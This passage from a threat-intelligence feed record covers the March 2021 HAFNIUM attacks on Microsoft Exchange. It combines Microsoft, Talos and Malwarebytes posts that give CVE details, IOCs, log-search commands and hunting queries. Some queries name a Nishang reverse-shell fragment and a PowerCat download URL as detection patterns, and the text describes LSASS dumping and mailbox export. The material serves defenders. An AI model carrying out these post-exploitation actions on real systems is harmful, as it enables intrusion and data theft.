Advanced hunting queries\n\nTo locate possible exploitation activity related to the contents of this blog, you can run the following [advanced hunting](<https://securitycenter.windows.com/hunting>) queries via Microsoft Defender for Endpoint and Azure Sentinel:\n\n### Microsoft Defender for Endpoint advanced hunting queries\n\nMicrosoft 365 Defender customers can find related hunting queries below or at this GitHub location: [https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/ ](<https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/>)\n\nAdditional queries and information are available via [_Threat Analytics portal_](<https://securitycenter.windows.com/threatanalytics3/>) for Microsoft Defender customers.\n\n**UMWorkerProcess.exe in Exchange creating abnormal content**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service creating non-standard content on disk, which could indicate web shells or other malicious content, suggesting exploitation of CVE-2021-26858 vulnerability:\n\n`DeviceFileEvents | where InitiatingProcessFileName == \"UMWorkerProcess.exe\" | where FileName != \"CacheCleanup.bin\" | where FileName !endswith \".txt\" | where FileName !endswith \".LOG\" | where FileName !endswith \".cfg\" | where FileName != \"cleanup.bin\"`\n\n**UMWorkerProcess.exe spawning**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service spawning abnormal subprocesses, suggesting exploitation of CVE-2021-26857 vulnerability:\n\n`DeviceProcessEvents | where InitiatingProcessFileName == \"UMWorkerProcess.exe\" | where FileName != \"wermgr.exe\" | where FileName != \"WerFault.exe\"`\n\nPlease note excessive spawning of wermgr.exe and WerFault.exe could be an indicator of compromise due to the service crashing during deserialization.\n\n### Azure Sentinel advanced hunting queries\n\nAzure Sentinel customers can find a Sentinel query containing these indicators in the Azure Sentinel Portal or at this GitHub location: <https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/>.\n\nLook for Nishang Invoke-PowerShellTcpOneLine in Windows Event Logging:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"powershell.exe\", \"PowerShell_ISE.exe\") | where CommandLine has \"$client = New-Object System.Net.Sockets.TCPClient\"`\n\nLook for downloads of PowerCat in cmd and Powershell command line logging in Windows Event Logs:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") | where CommandLine has \"https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\"`\n\nLook for Exchange PowerShell Snapin being loaded. This can be used to export mailbox data, subsequent command lines should be inspected to verify usage:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") | where isnotempty(CommandLine) | where CommandLine contains \"Add-PSSnapin Microsoft.Exchange.Powershell.Snapin\" | summarize FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated) by Computer, Account, CommandLine`\n\n \n\nThe post [HAFNIUM targeting Exchange Servers with 0-day exploits](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T21:07:53", "type": "mssecure", "title": "HAFNIUM targeting Exchange Servers with 0-day exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-02T21:07:53", "id": "MSSECURE:28641FE2F73292EB4B26994613CC882B", "href": "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2021-03-10T14:27:54", "description": "Microsoft released patches for four vulnerabilities in Exchange Server on March 2, disclosing that these vulnerabilities were being exploited by a previously unknown threat actor, referred to as HAFNIUM. The vulnerabilities in question \u2014 CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065 \u2014 affect Microsoft Exchange Server 2019, 2016, 2013 and the out-of-support Microsoft Exchange Server 2010. The patches for these vulnerabilities should be applied as soon as possible. Microsoft... \n \n[[ This is only the beginning! Please visit the blog for the complete entry ]]", "cvss3": {}, "published": "2021-03-08T10:18:43", "type": "talosblog", "title": "Threat Advisory: HAFNIUM and Microsoft Exchange zero-day", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-08T10:18:43", "id": "TALOSBLOG:AC8ED8970F5692A325A10D93B7F0D965", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/YIQrIoqvPyk/threat-advisory-hafnium-and-microsoft.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-03-16T10:27:50", "description": "Microsoft has detected multiple [zero-day](<https://blog.malwarebytes.com/glossary/zero-day/>) exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. Microsoft attributes the attacks to a group they have dubbed Hafnium.\n\n> \u201cHAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.\u201d\n\n### The Hafnium attack group\n\nBesides a rare metal that chemically resembles zirconium, Hafnium is a newly identified attack group that is also thought to be responsible for other attacks on internet-facing servers, and typically exfiltrates data to [file sharing sites](<https://blog.malwarebytes.com/how-tos-2/2020/12/file-sharing-and-cloud-storage-sites-how-safe-are-they/>). Despite their use of leased servers in the US, the group is believed to be based in China (as most security researchers will tell you, attribution is hard, especially when it involves international espionage).\n\n### Exchange Server\n\nIn many organizations, internal cooperation depends on groupware solutions that enable the central administration of emails, calendars, contacts, and tasks. Microsoft Exchange Server is software that offers this functionality for Windows-based server systems.\n\nIn this case the attacker was using one of the zero-day vulnerabilities to steal the full contents of several user mailboxes from such servers.\n\n### Not one, but four zero-days\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The CVE\u2019s (with descriptions provided by Microsoft) used in these attacks were:\n\n * [**CVE-2021-26855**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * [**CVE-2021-26857**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * [**CVE-2021-26858**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * [**CVE-2021-27065**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n\nThey all look the same. Boring you said? Read on!\n\n### The attack chain\n\nWhile the CVE description is the same for the 4 CVE\u2019s we can learn from the report by the security firm that discovered the attacks, Volexity, that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The Remote Code Execution (RCE) vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws \u2014 CVE-2021-26858 and CVE-2021-27065 \u2014 would allow an attacker to write a file to any part of the server.\n\nTogether these 4 vulnerabilities form a powerful attack chain which only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, Hafnium operators deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\n### Urgent patching necessary\n\nEven though the use of the vulnerabilities was described as \u201climited\u201d, now that the information has been made public, we may see a quick rise in the number of attacks. Especially since the attack does not require a lot of information about the victim to start with.\n\nOr as Microsoft\u2019s vice president for customer security Tom Burt put it:\n\n> \u201cEven though we\u2019ve worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.\u201d\n\nUsers of Microsoft Exchange Server 2013, Microsoft Exchange Server 2016, and Microsoft Exchange Server 2019 are advised to apply the updates immediately to protect against these exploits, prioritizing the externally facing Exchange servers.\n\nMicrosoft also advises that the initial stage of the attack can be stopped by &quot;restricting untrusted connections, or by setting up a VPN to separate the Exchange server from external access&quot;, although the other parts of the attack chain can still be exploited, if other means of access are used.\n\n### Update March 4, 2021\n\nThe Cybersecurity and Infrastructure Security Agency issued an [emergency directive](<https://cyber.dhs.gov/ed/21-02/>) after CISA partners observed active exploitation of vulnerabilities in Microsoft Exchange _on-premises_ products. The directive gives detailed instructions for agencies to follow immediately after identifying all instances of on-premises Microsoft Exchange Servers in their environment.\n\nFor readers that are interested in the more technical details of the attack chain, [Veloxity published a blog](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) that provides details about their investigation, the vulnerabilities, and which also includes IOCs.\n\n### Update March 5, 2021\n\nIt turns out that [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) was discovered in December of 2020 by DEVCORE who named the vulnerability ProxyLogon. They called it [ProxyLogon](<https://proxylogon.com/>) because this bug exploits against the Exchange **Proxy** Architecture and **Logon** mechanism. After DEVCORE chained the bugs together to a workable pre-auth RCE exploit, they sent an advisory and exploit to Microsoft through the MSRC portal. The entire timeline can be found [here](<https://proxylogon.com/#timeline>).\n\n### Update March 8, 2021\n\nMicrosoft has released an [updated script that scans Exchange log files](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) for indicators of compromise (IOCs) associated with the vulnerabilities disclosed on March 2, 2021. The US Cybersecurity &amp; Infrastructure Security Agency (CISA) has [issued a warning](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/06/microsoft-ioc-detection-tool-exchange-server-vulnerabilities>) that it is aware of widespread domestic and international exploitation of these vulnerabilities and strongly recommends organizations run the script as soon as possible.\n\nMicrosoft has also added definitions to its standalone malware scanner, the [Microsoft Safety Scanner](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download>) (also known as the Microsoft Support Emergency Response Tool or MSERT), so that it detects web shells.\n\nMalwarebytes detects web shells planted on comprised Exchange servers as [Backdoor.Hafnium](<https://blog.malwarebytes.com/detections/backdoor-hafnium/>). You can read more about the use of web shells in Exchange server attacks in our article [Microsoft Exchange attacks cause panic as criminals go shell collecting](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>).\n\n### Update March 12, 2021\n\nThe abuse of these vulnerabilities has sky-rocketed, and the first public proof-of-concept (PoC) exploit for the ProxyLogon flaws has appeared on GitHub, only to be taken down by the site. In spite of Microsoft&#x27;s efforts, cybercriminals have shown in numbers that they are exploiting this opportunity to the fullest.\n\nA new form of ransomware has also entered the mix. Detections for DearCry, a new form of human-operated ransomware that&#x27;s deployed through compromised Exchange servers, began yesterday. When the ransomware was still unknown, it would have been detected by Malwarebytes proactively, as Malware.Ransom.Agent.Generic. \n\nYou can read more about DearCry ransomware attacks in our article [Ransomware is targeting vulnerable Microsoft Exchange servers](<https://blog.malwarebytes.com/ransomware/2021/03/ransomware-is-targeting-vulnerable-microsoft-exchange-servers/>).\n\n### Update March 16, 2021\n\nMicrosoft has released a new, one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\n\nDetails, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>). \n\nWe will keep you posted as we gather more information about these ransomware attacks.\n\nStay safe, everyone!\n\nThe post [Patch now! Exchange servers attacked by Hafnium zero-days](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-03T12:34:27", "type": "malwarebytes", "title": "Patch now! Exchange servers attacked by Hafnium zero-days", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T12:34:27", "id": "MALWAREBYTES:B4D157FAC0EB655355514D120382CC56", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mmpc": [{"lastseen": "2021-03-10T12:28:51", "description": "_**Update [03/08/2021]**: Microsoft continues to see multiple actors taking advantage of unpatched systems to attack organizations with on-premises Exchange Server. To aid defenders in investigating these attacks where Microsoft security products and tooling may not be deployed, we are releasing a feed of observed indicators of compromise (IOCs). The feed of malware hashes and known malicious file paths observed in related attacks is available in both JSON and CSV formats at the below GitHub links. This information is being shared as TLP:WHITE._\n\n * [CSV format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>)\n * [JSON format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>)\n\n_**Update [03/05/2021]**: Microsoft sees increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM. To aid customers in investigating these attacks, __Microsoft Security Response Center (MSRC) has provided additional resources, including new mitigation guidance: [Microsoft Exchange Server Vulnerabilities Mitigations \u2013 March 2021](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>)_\n\n_**Update [03/04/2021]**: The Exchange Server team released a script for checking HAFNIUM indicators of compromise (IOCs). See Scan Exchange log files for indicators of compromise._\n\n \n\nMicrosoft has detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to [HAFNIUM](<https://blogs.microsoft.com/on-the-issues/?p=64505>), a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.\n\nThe vulnerabilities recently being exploited were CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which were addressed in today\u2019s [Microsoft Security Response Center (MSRC) release - Multiple Security Updates Released for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). We strongly urge customers to update on-premises systems immediately. Exchange Online is not affected.\n\nWe are sharing this information with our customers and the security community to emphasize the critical nature of these vulnerabilities and the importance of patching all affected systems immediately to protect against these exploits and prevent future abuse across the ecosystem. This blog also continues our mission to shine a light on malicious actors and elevate awareness of the sophisticated tactics and techniques used to target our customers. The related IOCs, [Azure Sentinel](<https://azure.microsoft.com/en-us/services/azure-sentinel/>) advanced hunting queries, and [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) product detections and queries shared in this blog will help SOCs proactively hunt for related activity in their environments and elevate any alerts for remediation.\n\nMicrosoft would like to thank our industry colleagues at Volexity and Dubex for reporting different parts of the attack chain and their collaboration in the investigation. Volexity has also [published a blog post](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities>) with their analysis. It is this level of proactive communication and intelligence sharing that allows the community to come together to get ahead of attacks before they spread and improve security for all.\n\n## Who is HAFNIUM?\n\nHAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.\n\nHAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like [Covenant](<https://github.com/cobbr/Covenant>), for command and control. Once they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like [MEGA](<https://mega.nz/>).\n\nIn campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets\u2019 environments.\n\nHAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.\n\n## Technical details\n\nMicrosoft is providing the following details to help our customers understand the techniques used by HAFNIUM to exploit these vulnerabilities and enable more effective defense against any future attacks against unpatched systems.\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.\n\n[CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.\n\n[CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n[CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n## Attack details\n\nAfter exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise. One example of a web shell deployed by HAFNIUM, written in ASP, is below:\n\n\n\nFollowing web shell deployment, HAFNIUM operators performed the following post-exploitation activity:\n\n * Using Procdump to dump the LSASS process memory:\n\n\n\n * Using 7-Zip to compress stolen data into ZIP files for exfiltration:\n\n\n\n * Adding and using Exchange PowerShell snap-ins to export mailbox data:\n\n\n\n * Using the [Nishang](<https://github.com/samratashok/nishang>) Invoke-PowerShellTcpOneLine reverse shell:\n\n\n\n * Downloading PowerCat from GitHub, then using it to open a connection to a remote server:\n\n\n\nHAFNIUM operators were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users.\n\nOur blog, [Defending Exchange servers under attack](<https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/>), offers advice for improving defenses against Exchange server compromise. Customers can also find additional guidance about web shell attacks in our blog [Web shell attacks continue to rise.](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>)\n\n## Can I determine if I have been compromised by this activity?\n\nThe below sections provide indicators of compromise (IOCs), detection guidance, and advanced hunting queries to help customers investigate this activity using Exchange server logs, Azure Sentinel, Microsoft Defender for Endpoint, and Microsoft 365 Defender. We encourage our customers to conduct investigations and implement proactive detections to identify possible prior campaigns and prevent future campaigns that may target their systems.\n\n### Check patch levels of Exchange Server\n\nThe Microsoft Exchange Server team has published a [blog post on these new Security Updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) providing a script to get a quick inventory of the patch-level status of on-premises Exchange servers and answer some basic questions around installation of these patches.\n\n### Scan Exchange log files for indicators of compromise\n\nThe Exchange Server team has created a script to run a check for HAFNIUM IOCs to address performance and memory concerns. That script is available here: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n\n * CVE-2021-26855 exploitation can be detected via the following Exchange HttpProxy logs: \n * These logs are located in the following directory: %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\n * Exploitation can be identified by searching for log entries where the AuthenticatedUser is empty and the AnchorMailbox contains the pattern of ServerInfo~*/* \n * Here is an example PowerShell command to find these log entries:\n\n`Import-Csv -Path (Get-ChildItem -Recurse -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\" -Filter '*.log').FullName | Where-Object { $_.AnchorMailbox -like 'ServerInfo~*/*' -or $_.BackEndCookie -like 'Server~*/*~*'} | select DateTime, AnchorMailbox, UrlStem, RoutingHint, ErrorCode, TargetServerVersion, BackEndCookie, GenericInfo, GenericErrors, UrlHost, Protocol, Method, RoutingType, AuthenticationType, ServerHostName, HttpStatus, BackEndStatus, UserAgent`\n\n * * If activity is detected, the logs specific to the application specified in the AnchorMailbox path can be used to help determine what actions were taken. \n * These logs are located in the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging directory.\n * CVE-2021-26858 exploitation can be detected via the Exchange log files: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\n * Files should only be downloaded to the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\ClientAccess\\OAB\\Temp directory \n * In case of exploitation, files are downloaded to other directories (UNC or local paths)\n * Windows command to search for potential exploitation:\n\n`findstr /snip /c:\"Download failed and temporary file\" \"%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\\*.log\"`\n\n * CVE-2021-26857 exploitation can be detected via the Windows Application event logs \n * Exploitation of this deserialization bug will create Application events with the following properties: \n * Source: MSExchange Unified Messaging\n * EntryType: Error\n * Event Message Contains: System.InvalidCastException\n * Following is PowerShell command to query the Application Event Log for these log entries:\n\n`Get-EventLog -LogName Application -Source \"MSExchange Unified Messaging\" -EntryType Error | Where-Object { $_.Message -like \"*System.InvalidCastException*\" }`\n\n * CVE-2021-27065 exploitation can be detected via the following Exchange log files: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\n\nAll Set-&lt;AppName&gt;VirtualDirectory properties should never contain script. InternalUrl and ExternalUrl should only be valid Uris.\n\n * * Following is a PowerShell command to search for _potential_ exploitation:\n\n`Select-String -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\\*.log\" -Pattern 'Set-.+VirtualDirectory'`\n\n## Host IOCs\n\nMicrosoft is releasing a feed of observed indicators of compromise (IOCs) in related attacks. This feed is available in both [CSV](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>) and [JSON](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>) formats. This information is being shared as TLP:WHITE.\n\n### Hashes\n\nWeb shell hashes\n\n * b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0\n * 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e\n * 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1\n * 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5\n * 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1\n * 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea\n * 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d\n * 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944\n\n### Paths\n\nWe observed web shells in the following paths:\n\n * _C:\\inetpub\\wwwroot\\aspnet_client\\_\n * _C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\_\n * _In Microsoft Exchange Server installation paths such as:_\n * _%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\_\n * _C:\\Exchange\\FrontEnd\\HttpProxy\\owa\\auth\\_\n\nThe web shells we detected had the following file names:\n\n * _web.aspx_\n * _help.aspx_\n * _document.aspx_\n * _errorEE.aspx_\n * _errorEEE.aspx_\n * _errorEW.aspx_\n * _errorFF.aspx_\n * _healthcheck.aspx_\n * _aspnet_www.aspx_\n * _aspnet_client.aspx_\n * _xx.aspx_\n * _shell.aspx_\n * _aspnet_iisstart.aspx_\n * _one.aspx_\n\n_ _Check for suspicious .zip, .rar, and .7z files in _C:\\ProgramData\\_, which may indicate possible data exfiltration.\n\nCustomers should monitor these paths for LSASS dumps:\n\n * _C:\\windows\\temp\\_\n * _C:\\root\\_\n\n### Tools\n\n * [Procdump](<https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>)\n * [Nishang](<https://github.com/samratashok/nishang>)\n * [PowerCat](<https://github.com/besimorhino/powercat>)\n\nMany of the following detections are for post-breach techniques used by HAFNIUM. So while these help detect some of the specific current attacks that Microsoft has observed it remains very important to apply the recently released updates for CVE-2021-26855, CVE-2021-26857, CVE-2021-27065 and CVE-2021-26858.\n\n## Microsoft Defender Antivirus detections\n\nPlease note that some of these detections are generic detections and not unique to this campaign or these exploits.\n\n * Exploit:Script/Exmann.A!dha\n * Behavior:Win32/Exmann.A\n * Backdoor:ASP/SecChecker.A\n * Backdoor:JS/Webshell _(not unique)_\n * Trojan:JS/Chopper!dha _(not unique)_\n * Behavior:Win32/DumpLsass.A!attk _(not unique)_\n * Backdoor:HTML/TwoFaceVar.B _(not unique)_\n\n## Microsoft Defender for Endpoint detections\n\n * Suspicious Exchange UM process creation\n * Suspicious Exchange UM file creation\n * Possible web shell installation _(not unique)_\n * Process memory dump _(not unique)_\n\n## Azure Sentinel detections\n\n * [HAFNIUM Suspicious Exchange Request](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/W3CIISLog/HAFNIUMSuspiciousExchangeRequestPattern.yaml>)\n * [HAFNIUM UM Service writing suspicious file](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/HAFNIUMUmServiceSuspiciousFile.yaml>)\n * [HAFNIUM New UM Service Child Process](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMNewUMServiceChildProcess.yaml>)\n * [HAFNIUM Suspicious UM Service Errors](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMSuspiciousIMServiceError.yaml>)\n * [HAFNIUM Suspicious File Downloads](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/htttp_proxy_oab_CL/HAFNIUMSuspiciousFileDownloads.yaml>)\n\n## Advanced hunting queries\n\nTo locate possible exploitation activity related to the contents of this blog, you can run the following [advanced hunting](<https://securitycenter.windows.com/hunting>) queries via Microsoft Defender for Endpoint and Azure Sentinel:\n\n### Microsoft Defender for Endpoint advanced hunting queries\n\nMicrosoft 365 Defender customers can find related hunting queries below or at this GitHub location: [https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/ ](<https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/>)\n\nAdditional queries and information are available via [_Threat Analytics portal_](<https://securitycenter.windows.com/threatanalytics3/>) for Microsoft Defender customers.\n\n**UMWorkerProcess.exe in Exchange creating abnormal content**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service creating non-standard content on disk, which could indicate web shells or other malicious content, suggesting exploitation of CVE-2021-26858 vulnerability:\n\n`DeviceFileEvents | where InitiatingProcessFileName == \"UMWorkerProcess.exe\" | where FileName != \"CacheCleanup.bin\" | where FileName !endswith 